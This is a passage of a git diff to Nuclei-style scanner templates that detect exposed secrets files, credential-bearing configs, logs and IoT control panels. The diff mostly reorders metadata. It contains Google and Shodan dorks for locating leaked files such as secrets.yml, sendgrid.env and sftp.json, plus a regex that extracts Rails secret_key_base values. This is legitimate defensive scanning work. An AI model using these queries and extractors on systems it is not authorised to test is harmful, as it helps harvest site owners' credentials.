4a0a00473045022025f5b925939cc1d42f8dc9b01ec2186c4e34e8e972e35116f3b9070227a351f6022100bf75273944ae4353ebd22e9fe8bfc3fa3182d098162dc13e02c7ade088516ec3:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022025f5b925939cc1d42f8dc9b01ec2186c4e34e8e972e35116f3b9070227a351f6022100bf75273944ae4353ebd22e9fe8bfc3fa3182d098162dc13e02c7ade088516ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index 517abcd270..1d2e79ff14 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -6,16 +6,16 @@ info: severity: high description: Ruby on Rails internal secret file is exposed. reference: https://www.exploit-db.com/ghdb/6283 + classification: + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - google-query: intitle:"index of" "secrets.yml" - product: rails vendor: rubyonrails + product: rails + google-query: intitle:"index of" "secrets.yml" tags: cloud,devops,files,exposure,misconfig - classification: - cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* http: - method: GET path: @@ -50,4 +50,5 @@ http: group: 1 regex: - 'secret_key_base: ([a-z0-9]+)' -# digest: 4a0a004730450221008f3c78e37d6034c88fc8a231da592e10d3f0dd3cffc406c8f8ce4b3bb86ccf7802201eb77dae641b3f6691653ae35bfe9c03af2cc9716703b1d9288c516869363fbb:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008f3c78e37d6034c88fc8a231da592e10d3f0dd3cffc406c8f8ce4b3bb86ccf7802201eb77dae641b3f6691653ae35bfe9c03af2cc9716703b1d9288c516869363fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index a35fcb8cc6..405887b3b2 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: medium description: SendGrid file is exposed containing environment variables. + classification: + cpe: cpe:2.3:a:sendgrid:sendgrid:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"sendgrid.env" - product: sendgrid vendor: sendgrid + product: sendgrid + shodan-query: html:"sendgrid.env" tags: exposure,sendgrid,key,api,files - classification: - cpe: cpe:2.3:a:sendgrid:sendgrid:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: status: - 429 negative: true -# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/svn-wc-db.yaml b/http/exposures/files/svn-wc-db.yaml index 7f2813e89b..e5a6053954 100644 --- a/http/exposures/files/svn-wc-db.yaml +++ b/http/exposures/files/svn-wc-db.yaml @@ -9,16 +9,16 @@ info: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb - https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761 + classification: + cpe: cpe:2.3:a:apache:subversion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: intitle:"index of" "wc.db" - product: subversion vendor: apache + product: subversion + google-query: intitle:"index of" "wc.db" tags: msf,exposure,svn,config,files - classification: - cpe: cpe:2.3:a:apache:subversion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207b3da2350ab0dfe42fea1b9232ea351923200d1ea45bd9d3ae7a0c20ab8b1a5102210094ee3f8bfe328ad9a92ca4f3473a4e14a0dfe5e9f2a598b38282b826b31c7f38:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502207b3da2350ab0dfe42fea1b9232ea351923200d1ea45bd9d3ae7a0c20ab8b1a5102210094ee3f8bfe328ad9a92ca4f3473a4e14a0dfe5e9f2a598b38282b826b31c7f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/symfony-properties-ini.yaml b/http/exposures/files/symfony-properties-ini.yaml index f59b6ee2b4..09c16ca92b 100644 --- a/http/exposures/files/symfony-properties-ini.yaml +++ b/http/exposures/files/symfony-properties-ini.yaml @@ -4,16 +4,16 @@ info: name: Symfony properties.ini File Disclosure author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: intitle:"index of" "properties.ini" - product: symfony vendor: sensiolabs + product: symfony + google-query: intitle:"index of" "properties.ini" tags: symfony,exposure,files - classification: - cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4b0a004830460221009c590f650284445bb511c472384938202529e15f42e37b04696036b32a3433a2022100bcf4ae8450540eb6376b9a70814dc8d440160159dc139c5579fb4107bc84e23c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009c590f650284445bb511c472384938202529e15f42e37b04696036b32a3433a2022100bcf4ae8450540eb6376b9a70814dc8d440160159dc139c5579fb4107bc84e23c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/symfony-security.yaml b/http/exposures/files/symfony-security.yaml index bb59999dec..20c09b47b2 100644 --- a/http/exposures/files/symfony-security.yaml +++ b/http/exposures/files/symfony-security.yaml @@ -4,16 +4,16 @@ info: name: Symfony security.yml File Disclosure author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - google-query: intitle:"index of" "security.yml" - product: symfony vendor: sensiolabs + product: symfony + google-query: intitle:"index of" "security.yml" tags: symfony,devops,exposure,files - classification: - cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 490a0046304402206b983d3e4e1ef38d3b4cae7cb19f910b490bd9d810342b577fd73e30f95ce72802206402029e10542ce58e676260699f3ec277efb05242fa7682891cd42ab28e0d40:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b983d3e4e1ef38d3b4cae7cb19f910b490bd9d810342b577fd73e30f95ce72802206402029e10542ce58e676260699f3ec277efb05242fa7682891cd42ab28e0d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/token-info-json.yaml b/http/exposures/files/token-info-json.yaml index 1604b1761b..7afddef6ee 100644 --- a/http/exposures/files/token-info-json.yaml +++ b/http/exposures/files/token-info-json.yaml @@ -4,16 +4,16 @@ info: name: Token Info Json File author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:sample_token_project:sample_token:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: intitle:"index of" "token_info.json" - product: sample_token vendor: sample_token_project + product: sample_token + google-query: intitle:"index of" "token_info.json" tags: exposure,files - classification: - cpe: cpe:2.3:a:sample_token_project:sample_token:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 4b0a00483046022100f420ba79911fd29c63f7365743ff05b6c6eef9e687e4700db013f8e42edae392022100f0aade0d69ca9f6b387ef97843030a9f59a1b7a2a02a84c494cbb3986b8dbeb7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f420ba79911fd29c63f7365743ff05b6c6eef9e687e4700db013f8e42edae392022100f0aade0d69ca9f6b387ef97843030a9f59a1b7a2a02a84c494cbb3986b8dbeb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/uwsgi-ini.yaml b/http/exposures/files/uwsgi-ini.yaml index 8956431cae..2ce78b912f 100644 --- a/http/exposures/files/uwsgi-ini.yaml +++ b/http/exposures/files/uwsgi-ini.yaml @@ -4,16 +4,16 @@ info: name: uwsgi.ini File Exposure author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"uwsgi.ini" - product: uwsgi vendor: unbit + product: uwsgi + shodan-query: html:"uwsgi.ini" tags: exposure,uwsgi,files - classification: - cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 4b0a00483046022100ea5c8e3dccd08443fd1e42d07613be036ff5246ced60b3bcc4d89c078f010b2d022100d2acba3ca576db38777ff49c3a1ef45f6dd94e328787434c8ef6be296a33f9d5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ea5c8e3dccd08443fd1e42d07613be036ff5246ced60b3bcc4d89c078f010b2d022100d2acba3ca576db38777ff49c3a1ef45f6dd94e328787434c8ef6be296a33f9d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/viminfo-disclosure.yaml b/http/exposures/files/viminfo-disclosure.yaml index 98e1d697ac..762d62e6e1 100644 --- a/http/exposures/files/viminfo-disclosure.yaml +++ b/http/exposures/files/viminfo-disclosure.yaml @@ -8,16 +8,16 @@ info: Viminfo file was detected. reference: - https://renenyffenegger.ch/notes/development/vim/editing/viminfo/index + classification: + cpe: cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Viminfo" - product: vim vendor: vim + product: vim + shodan-query: html:"Viminfo" tags: devops,exposure,viminfo,config - classification: - cpe: cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,4 @@ http: status: - 200 -# digest: 490a004630440220778d9bfb13df46593453e6e11bbae8931112f2d6b97b5e4a5825d0eeae42af8202202f27116c557a1ee76a284cc98400bdb792a88f95295f2b710cc4fb110a936278:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220778d9bfb13df46593453e6e11bbae8931112f2d6b97b5e4a5825d0eeae42af8202202f27116c557a1ee76a284cc98400bdb792a88f95295f2b710cc4fb110a936278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/vscode-sftp.yaml b/http/exposures/files/vscode-sftp.yaml index 4a5e5b3b77..ca30c0f0bd 100644 --- a/http/exposures/files/vscode-sftp.yaml +++ b/http/exposures/files/vscode-sftp.yaml @@ -6,16 +6,16 @@ info: severity: high description: | It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials. + classification: + cpe: cpe:2.3:a:microsoft:visual_studio_code:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: html:"sftp.json" - product: visual_studio_code vendor: microsoft + product: visual_studio_code + shodan-query: html:"sftp.json" tags: exposure,vscode,sftp,ssh,files - classification: - cpe: cpe:2.3:a:microsoft:visual_studio_code:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +44,4 @@ http: status: - 200 -# digest: 4a0a004730450221008b29d9873ec6870c1fe305232d363e69bec8f6146f66709fbf4468d6bce2d06f022078c30674b21f491c4efe798f52fe349e226fe072c62dacc6cbd1eb60c62d8cce:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008b29d9873ec6870c1fe305232d363e69bec8f6146f66709fbf4468d6bce2d06f022078c30674b21f491c4efe798f52fe349e226fe072c62dacc6cbd1eb60c62d8cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/webpack-mix-js.yaml b/http/exposures/files/webpack-mix-js.yaml index 663b4e6177..1d0a810168 100644 --- a/http/exposures/files/webpack-mix-js.yaml +++ b/http/exposures/files/webpack-mix-js.yaml @@ -4,16 +4,16 @@ info: name: Webpack Mix File Disclosure author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:webpack.js:webpack:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"webpack.mix.js" - product: webpack vendor: webpack.js + product: webpack + shodan-query: html:"webpack.mix.js" tags: config,exposure,devops,files - classification: - cpe: cpe:2.3:a:webpack.js:webpack:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 4a0a00473045022056e38db849c6e5b821a0cc291fc8e296c1aa9524a15597bbcd9a7b60d02d74420221009200ffd999ffb9d9442590767bbc02ac794e79cdd373c6a7dd9151cdc70bb3b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022056e38db849c6e5b821a0cc291fc8e296c1aa9524a15597bbcd9a7b60d02d74420221009200ffd999ffb9d9442590767bbc02ac794e79cdd373c6a7dd9151cdc70bb3b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/wp-cli-exposure.yaml b/http/exposures/files/wp-cli-exposure.yaml index c050c6df4b..abbe56bb08 100644 --- a/http/exposures/files/wp-cli-exposure.yaml +++ b/http/exposures/files/wp-cli-exposure.yaml @@ -4,16 +4,16 @@ info: name: WP-CLI Yaml File Exposure author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:wp-cli:wp-cli:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"wp-cli.yml" - product: wp-cli vendor: wp-cli + product: wp-cli + shodan-query: html:"wp-cli.yml" tags: config,exposure,wp-cli,files - classification: - cpe: cpe:2.3:a:wp-cli:wp-cli:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a00463044022003699009e01e265a721223cb412bd19c629527a0d37f02a57723061054d81d7d02206fbb5502dbfce7bb40f70212f2a7e1feeabb20da376a7c9811713f9045b4b651:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022003699009e01e265a721223cb412bd19c629527a0d37f02a57723061054d81d7d02206fbb5502dbfce7bb40f70212f2a7e1feeabb20da376a7c9811713f9045b4b651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/ws-ftp-ini.yaml b/http/exposures/files/ws-ftp-ini.yaml index f74a948ab9..1b9c8cad91 100644 --- a/http/exposures/files/ws-ftp-ini.yaml +++ b/http/exposures/files/ws-ftp-ini.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: low description: WS FTP file is disclosed. + classification: + cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - google-query: intitle:"Index of" ws_ftp.ini - product: ws_ftp vendor: ipswitch + product: ws_ftp + google-query: intitle:"Index of" ws_ftp.ini tags: exposure,ftp,files - classification: - cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ea31a3317446f7a301ca1361942add6d318a0542fde33aef0647ba6294de12e0221008fa0c1b2de309a3b4949698253fadf3344e74f286a907e365f9b98d9085a00b1:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009ea31a3317446f7a301ca1361942add6d318a0542fde33aef0647ba6294de12e0221008fa0c1b2de309a3b4949698253fadf3344e74f286a907e365f9b98d9085a00b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/fastcgi-echo.yaml b/http/exposures/logs/fastcgi-echo.yaml index 2f9c53d0a0..067a6576d4 100644 --- a/http/exposures/logs/fastcgi-echo.yaml +++ b/http/exposures/logs/fastcgi-echo.yaml @@ -10,16 +10,16 @@ info: reference: - https://www.exploit-db.com/ghdb/183 - https://www.integrigy.com/oracle-application-server-fastcgi-echo-vulnerability-reports + classification: + cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - google-query: inurl:fcgi-bin/echo - product: fcgi vendor: fastcgi + product: fcgi + google-query: inurl:fcgi-bin/echo tags: exposure,logs,oracle,fastcgi,edb - classification: - cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,4 @@ http: status: - 200 -# digest: 4b0a00483046022100c1515f3e8783832b51ecb2f9f9c894bbc5850ba330d49ebcdad5e01313db1abf022100b7bdb610aef885d22f7ee4934f754bed143ca8ed501c966a8218f328e3279502:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c1515f3e8783832b51ecb2f9f9c894bbc5850ba330d49ebcdad5e01313db1abf022100b7bdb610aef885d22f7ee4934f754bed143ca8ed501c966a8218f328e3279502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/npm-debug-log.yaml b/http/exposures/logs/npm-debug-log.yaml index c47a4a7d97..39ce72790a 100644 --- a/http/exposures/logs/npm-debug-log.yaml +++ b/http/exposures/logs/npm-debug-log.yaml @@ -8,16 +8,16 @@ info: reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://docs.npmjs.com/generating-and-locating-npm-debug.log-files + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - github-query: filename:npm-debug.log - product: npm vendor: npmjs + product: npm + github-query: filename:npm-debug.log tags: exposure,npm,logs,debug - classification: - cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/npm-log-file.yaml b/http/exposures/logs/npm-log-file.yaml index b21c1f84f6..eee96c3fd6 100644 --- a/http/exposures/logs/npm-log-file.yaml +++ b/http/exposures/logs/npm-log-file.yaml @@ -7,16 +7,16 @@ info: description: NPM log file is exposed to external users. reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"npm-debug.log" - product: npm vendor: npmjs + product: npm + shodan-query: html:"npm-debug.log" tags: npm,logs,exposure - classification: - cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e083212c9e6ba90039b1774aed2b95d777c39b873fd4f9ee5792e4dbce2c9fc022061be5d69ed392493f0721e1fcd850d753b9fcb490ff8c4d10aacbaa18e2e5a48:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205e083212c9e6ba90039b1774aed2b95d777c39b873fd4f9ee5792e4dbce2c9fc022061be5d69ed392493f0721e1fcd850d753b9fcb490ff8c4d10aacbaa18e2e5a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/opentsdb-status.yaml b/http/exposures/logs/opentsdb-status.yaml index 31e09ef9d5..8ae2dcbce2 100644 --- a/http/exposures/logs/opentsdb-status.yaml +++ b/http/exposures/logs/opentsdb-status.yaml @@ -7,16 +7,16 @@ info: description: OpenTSDB stats exposed which is commonly used in monitoring and observability scenarios where tracking and analyzing the performance of systems, applications, and infrastructure over time is essential. reference: | http://opentsdb.net/ + classification: + cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:407286339 - product: opentsdb vendor: opentsdb + product: opentsdb + shodan-query: http.favicon.hash:407286339 tags: opentsdb,exposure,logs - classification: - cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/redis-exception-error.yaml b/http/exposures/logs/redis-exception-error.yaml index 6592454887..58b4be0dbe 100644 --- a/http/exposures/logs/redis-exception-error.yaml +++ b/http/exposures/logs/redis-exception-error.yaml @@ -7,16 +7,16 @@ info: description: Redis exception connection error page detected. reference: - https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/ + classification: + cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"redis.exceptions.ConnectionError" - product: redis vendor: redis + product: redis + shodan-query: html:"redis.exceptions.ConnectionError" tags: exposure,redis,logs - classification: - cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 500 -# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/ws-ftp-log.yaml b/http/exposures/logs/ws-ftp-log.yaml index 3dd56a4340..2b0b7d2a1c 100644 --- a/http/exposures/logs/ws-ftp-log.yaml +++ b/http/exposures/logs/ws-ftp-log.yaml @@ -5,16 +5,16 @@ info: author: Hardik-Solanki severity: low description: WS_FTP software, which is a popular FTP (File Transfer Protocol) client used for transferring files between a local computer and a remote server has its log file exposed. + classification: + cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: intitle:"Index of" ws_ftp.log - product: ws_ftp vendor: ipswitch + product: ws_ftp + google-query: intitle:"Index of" ws_ftp.log tags: exposure,ftp,logs - classification: - cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/yii-error-page.yaml b/http/exposures/logs/yii-error-page.yaml index 389925dab4..b3da647f34 100644 --- a/http/exposures/logs/yii-error-page.yaml +++ b/http/exposures/logs/yii-error-page.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: unknown description: Yii (An application framework to handle and manage errors) error page detected. + classification: + cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"yii\base\ErrorException" - product: yii vendor: yii_software + product: yii + shodan-query: html:"yii\base\ErrorException" tags: exposure,yii,logs - classification: - cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index 97d1c4515e..7810cf51ee 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -8,16 +8,16 @@ info: Searches for JSON Web Key (JWK) file. reference: - https://portswigger.net/web-security/jwt/algorithm-confusion - metadata: - shodan-query: html:"jwks.json" - verified: true - max-request: 1 - product: jwt - vendor: jwt_project - tags: exposure,token,generic - classification: cpe: cpe:2.3:a:jwt_project:jwt:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: jwt_project + product: jwt + shodan-query: html:"jwks.json" + tags: exposure,token,generic + http: - method: GET path: @@ -29,6 +29,7 @@ http: - "{{BaseURL}}/jwks" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -44,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/grandstream-device-configuration.yaml b/http/iot/grandstream-device-configuration.yaml index d090cc093c..30b88bc9c0 100644 --- a/http/iot/grandstream-device-configuration.yaml +++ b/http/iot/grandstream-device-configuration.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: info description: Exposed Grandstream device configuration page detected. - metadata: - max-request: 1 - shodan-query: http.title:"Grandstream Device Configuration" - product: ht801_firmware - vendor: grandstream - tags: iot - classification: cpe: cpe:2.3:o:grandstream:ht801_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: grandstream + product: ht801_firmware + shodan-query: http.title:"Grandstream Device Configuration" + tags: iot + http: - method: GET path: @@ -28,4 +28,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/honeywell-building-control.yaml b/http/iot/honeywell-building-control.yaml index 8b471a982a..c1d24e9fd4 100644 --- a/http/iot/honeywell-building-control.yaml +++ b/http/iot/honeywell-building-control.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: info description: Honeywell Building control panel was detected. - metadata: - max-request: 1 - shodan-query: html:"Honeywell Building Control" - product: alerton_ascent_control_module - vendor: honeywell - tags: panel,iot - classification: cpe: cpe:2.3:h:honeywell:alerton_ascent_control_module:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: honeywell + product: alerton_ascent_control_module + shodan-query: html:"Honeywell Building Control" + tags: panel,iot + http: - method: GET path: @@ -28,4 +28,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/hp-color-laserjet-detect.yaml b/http/iot/hp-color-laserjet-detect.yaml index e71f28ba1e..442a319acd 100644 --- a/http/iot/hp-color-laserjet-detect.yaml +++ b/http/iot/hp-color-laserjet-detect.yaml @@ -8,17 +8,17 @@ info: reference: - http://www.hp.com/ - https://www.hp.com/us-en/shop/cv/printers + classification: + cpe: cpe:2.3:h:hp:color_laserjet_pro_mfp_m183_7kw56a:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: hp + product: color_laserjet_pro_mfp_m183_7kw56a shodan-query: http.title:"HP Color LaserJet" google-query: intitle:"HP Color LaserJet" - product: color_laserjet_pro_mfp_m183_7kw56a - vendor: hp tags: iot,hp - classification: - cpe: cpe:2.3:h:hp:color_laserjet_pro_mfp_m183_7kw56a:*:*:*:*:*:*:*:* http: - method: GET path: @@ -49,4 +49,5 @@ http: group: 1 regex: - '

